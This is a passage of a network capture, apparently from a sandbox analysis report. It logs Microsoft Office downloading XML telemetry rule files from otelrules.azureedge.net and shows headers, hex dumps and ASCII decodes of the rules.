                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1aaae978-201e-0096-4377-3bace6000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111020Z-1777c6cb754j47wfhC1TEB5wrw00000006sg00000000dq1f
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            50192.168.2.44978913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 7511da03-801e-0083-3b8c-3af0ae000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111020Z-178bfbc474bkvpdnhC1NYCuu2w00000001dg00000000ahyb
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            51192.168.2.44978813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111020Z-178bfbc474brk967hC1NYCfu60000000017g000000004141
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            52192.168.2.44978613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 479
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 24f33e75-301e-006e-0fb5-3bf018000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111020Z-1777c6cb7544n7p6hC1TEByvb40000000b7g000000001c73
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:20 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            53192.168.2.44979113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:22 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:22 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 7bd180c9-401e-008c-0e8c-3a86c2000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111022Z-178bfbc474bgvl54hC1NYCsfuw000000018g00000000e9rm
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            54192.168.2.44979413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:22 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:22 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 0a397e49-e01e-0051-357f-3b84b2000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111022Z-1777c6cb7544n7p6hC1TEByvb40000000b50000000006psz
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            55192.168.2.44979213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:22 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:22 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 138215a1-101e-0017-6465-3b47c7000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111022Z-178bfbc474bp8mkvhC1NYCzqnn0000000170000000007nsw
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            56192.168.2.44979313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:22 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:23 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 906eedcd-201e-0071-4861-3bff15000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111023Z-178bfbc474btvfdfhC1NYCa2en00000001dg00000000a28e
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            57192.168.2.44979513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:22 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:23 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 8e68b2a4-701e-005c-1a8c-3abb94000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111023Z-1777c6cb7544n7p6hC1TEByvb40000000b0g00000000hkby
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
